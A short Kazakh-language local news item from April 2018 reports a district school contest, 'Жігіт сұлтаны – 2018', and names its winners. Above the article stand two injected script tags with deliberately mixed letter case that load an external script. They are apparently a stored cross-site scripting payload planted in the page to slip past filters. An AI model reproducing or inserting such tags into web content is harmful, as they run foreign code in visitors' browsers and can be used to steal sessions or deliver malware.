<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.04.2018

Үстіміздегі жылдың жиырмасынша сәуірінде  Біржан сал елінде «Болашаққа бағдар: Рухани жаңғыру» мақалалық бағдарламасын жүзеге асыру аясында мектеп  оқушылары арасында аудандық

«Жігіт сұлтаны – 2018» байқауы өтті.

             Байқауда негізгі және орта мектептердің «Жігіт сұлтаны -2018» байқауының жеңімпаздары атанған 10 жігіт бақтарын сынады.          

Тартысты өткен сында жүйріктен жүйрік озар жарысқанда демекші, жүлделі үшінші орынды Амангелді орта мектебінің 9 –сынып оқушысы Еслямшин Мухамет иеленсе, екінші орынды Невский  орта мектебінің 9-сынып оқушысы Серікбол Марат бірінші орынды Абай атындағы №2 қазақ орта мектебінің 10- сынып оқушысы Зеннатов Адильхан өзара бөлісті. Бас жүлдені Шәймерден Қосшығұлов атындағы Қоғам орта мектебінің 10–сынып оқушысы Қайрулла Бижан жеңіп алып  «Жігіт сұлтаны -2018»  байқауының жеңімпазы атанды.  Жігіттердің өнеріне тәнті болған көрермендер осындай сайыс жыл сайын ұйымдастырылып тұрса деген өтініштерін білдіріп тарқасты.

Просмотров: 620

Қосымшалар:



Пікір қосу



Деректерді қолтаңбаға қосу